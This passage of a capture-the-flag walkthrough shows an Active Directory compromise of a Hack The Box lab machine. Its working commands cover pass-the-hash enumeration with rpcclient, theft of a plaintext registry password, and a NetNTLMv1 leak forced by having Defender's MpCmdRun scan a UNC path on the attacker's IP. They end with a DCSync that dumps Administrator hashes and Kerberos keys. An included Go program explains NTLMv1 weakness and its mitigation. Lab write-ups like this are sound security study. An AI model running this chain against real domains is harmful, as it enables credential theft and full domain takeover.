group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[System Managed Accounts Group] rid:[0x245]
group:[Storage Replica Administrators] rid:[0x246]

Take note of the RID of the Remote Management Users (0x244).

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "queryaliasmem builtin 0x244" apt.htb.local
        sid:[S-1-5-21-2993095098-2100462451-206186470-1106]

Look up the SID next.

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "lookupsids S-1-5-21-2993095098-2100462451-206186470-1106" apt.htb.local
S-1-5-21-2993095098-2100462451-206186470-1106 HTB\henry.vinson_adm (1)

Sweet. We should be looking at getting access to henry.vinson_adm next.

Impacket’s reg.py

Before we attempt to brute-force the password of henry.vinson_adm, perhaps we should take a look at the registry from henry.vinson’s view and see what we can glean from it?

python3 reg.py -k -no-pass htb.local/henry.vinson@apt.htb.local query -keyName hku
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
hku
hku\Console
hku\Control Panel
hku\Environment
hku\Keyboard Layout
hku\Network
hku\Software
hku\System
hku\Volatile Environment

This is positive! Let’s dig deeper.

python3 reg.py -k -no-pass htb.local/henry.vinson@apt.htb.local query -keyName hku\\Software
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
hku\Software
hku\Software\GiganticHostingManagementSystem
hku\Software\Microsoft
hku\Software\Policies
hku\Software\RegisteredApplications
hku\Software\VMware, Inc.
hku\Software\Wow6432Node
hku\Software\Classes

GiganticHostingManagementSystem??!!

python3 reg.py -k -no-pass htb.local/henry.vinson@apt.htb.local query -keyName hku\\Software\\GiganticHostingManagementSystem
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[!] Cannot check RemoteRegistry status. Hoping it is started...
hku\Software\GiganticHostingManagementSystem
        UserName        REG_SZ   henry.vinson_adm
        PassWord        REG_SZ   G1#[email protected]

Gotcha!

Foothold

Armed with henry.vinson_adm’s password, we can leverage Evil-WinRM to get ourselves a shell.

The file user.txt is at henry.vinson_adm’s Desktop.

Privilege Escalation

During enumeration of henry.vinson_adm’s account, I noticed PowerShell history that offers a hint for privilege escalation.

NetNTLM Downgrade Attack

Now that we know NetNTLM has been downgraded to NetNTLMv1 responses, which are significantly weaker than NetNTLMv2 (itself vulnerable to certain attacks), the question is this: how do we solicit a NetNTLMv1 response from the machine?

NetNTLM Response Leak

There is a GitHub repository that lists the various ways of leaking NetNTLM responses. Surprisingly (at least to me), Microsoft Defender can be “tricked” into scanning a file over SMB, thereby leaking the NetNTLMv1 response like so. We just have to run Responder with 1122334455667788 as the challenge and the --lm switch to force a NetNTLMv1 challenge/response.

Windows Defender

& '.\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe' -Scan -ScanType 3 -File \\10.10.14.10\file.txt

Responder

Armed with the NetNTLMv1 response, we can head over to crack.sh to crack the response back into its NT hash.
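Why a fixed 1122334455667788 challenge makes the captured NetNTLMv1 response crackable is visible in how the response is built. As an added example (not code from the post, Impacket or Responder), this Go program computes the NTLMv1 response per MS-NLMP 3.3.1 and verifies one against a hash, the way a server or an auditor would; the NT hash in main is the published MS-NLMP test vector (password "Password"), not a value from the box.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/hex"
	"fmt"
	"math/bits"
)

// desKeyFrom7 expands a 7-byte key fragment into the 8-byte form DES expects:
// seven key bits per byte, with the low bit set for odd parity. This is the
// key-expansion step inside MS-NLMP's DESL() function.
func desKeyFrom7(k7 []byte) []byte {
	k := []byte{
		k7[0],
		k7[0]<<7 | k7[1]>>1,
		k7[1]<<6 | k7[2]>>2,
		k7[2]<<5 | k7[3]>>3,
		k7[3]<<4 | k7[4]>>4,
		k7[4]<<3 | k7[5]>>5,
		k7[5]<<2 | k7[6]>>6,
		k7[6] << 1,
	}
	for i, b := range k {
		b &= 0xFE
		if bits.OnesCount8(b)%2 == 0 {
			b |= 1 // odd-parity bit; DES itself ignores it
		}
		k[i] = b
	}
	return k
}

// ntlmv1Response computes NTChallengeResponse = DESL(NT hash, ServerChallenge)
// (MS-NLMP 3.3.1): zero-pad the 16-byte NT hash to 21 bytes, split it into
// three 7-byte DES keys and encrypt the same 8-byte challenge under each.
func ntlmv1Response(ntHash, challenge []byte) ([]byte, error) {
	if len(ntHash) != 16 || len(challenge) != 8 {
		return nil, fmt.Errorf("need a 16-byte NT hash and an 8-byte challenge")
	}
	padded := make([]byte, 21) // bytes 16..20 are zero: the third key has only 16 unknown bits
	copy(padded, ntHash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		block, err := des.NewCipher(desKeyFrom7(padded[i*7 : i*7+7]))
		if err != nil {
			return nil, err
		}
		out := make([]byte, 8)
		block.Encrypt(out, challenge)
		resp = append(resp, out...)
	}
	return resp, nil
}

// verifyNTLMv1 is what the authenticating server (or an auditor holding the
// NT hash) does with a response: recompute and compare. The response depends
// only on (NT hash, challenge), so with a fixed challenge it is a pure
// function of the hash, which is what makes precomputed tables possible.
func verifyNTLMv1(ntHash, challenge, response []byte) bool {
	want, err := ntlmv1Response(ntHash, challenge)
	return err == nil && bytes.Equal(want, response)
}

func main() {
	// Constructed inputs: MS-NLMP 4.2.2 test-vector NT hash and the fixed
	// challenge Responder was run with in the post.
	ntHash, _ := hex.DecodeString("a4f49c406510bdcab6824ee7c30fd852")
	fixedChallenge, _ := hex.DecodeString("1122334455667788")

	resp, err := ntlmv1Response(ntHash, fixedChallenge)
	if err != nil {
		panic(err)
	}
	fmt.Printf("NTLMv1 response for fixed challenge: %x\n", resp)
	fmt.Printf("  block 1 (56-bit DES key, hash[0:7]):    %x\n", resp[0:8])
	fmt.Printf("  block 2 (56-bit DES key, hash[7:14]):   %x\n", resp[8:16])
	fmt.Printf("  block 3 (16-bit key, hash[14:16]+pad):  %x\n", resp[16:24])
	// Two single-DES blocks plus a 16-bit block is the whole secret. The
	// mitigation is to stop sending NTLMv1: LmCompatibilityLevel >= 3 on
	// clients, and 5 on the DC to refuse LM and NTLMv1 outright.
	fmt.Println("verifies against itself:", verifyNTLMv1(ntHash, fixedChallenge, resp))
}
```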

DCSync

Armed with the NT hash of the domain controller’s machine account, we can request its TGT with Impacket’s getTGT.py and perform DCSync with Impacket’s secretsdump.py to dump Administrator’s NT hash like so.

python3 getTGT.py -hashes :d167c3238864b12f5f82feae86a7f798 'htb.local/apt$@apt.htb.local'
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Saving ticket in apt$.ccache

Point KRB5CCNAME to apt$.ccache to use the ticket.

export KRB5CCNAME=apt\$.ccache

Dump Administrator’s NT hash.

python3 secretsdump.py -k -no-pass 'htb.local/apt$@apt.htb.local' -just-dc-user administrator
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c370bddf384a691d811ff3495e8a72e2:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:72f9fc8f3cd23768be8d37876d459ef09ab591a729924898e5d9b3c14db057e3
Administrator:aes128-cts-hmac-sha1-96:a3b0c1332eee9a89a2aada1bf8fd9413
Administrator:des-cbc-md5:0816d9d052239b8a
[*] Cleaning up...

With the NT hash, we can get a shell as Administrator with Evil-WinRM.

The end is here…

:dancer: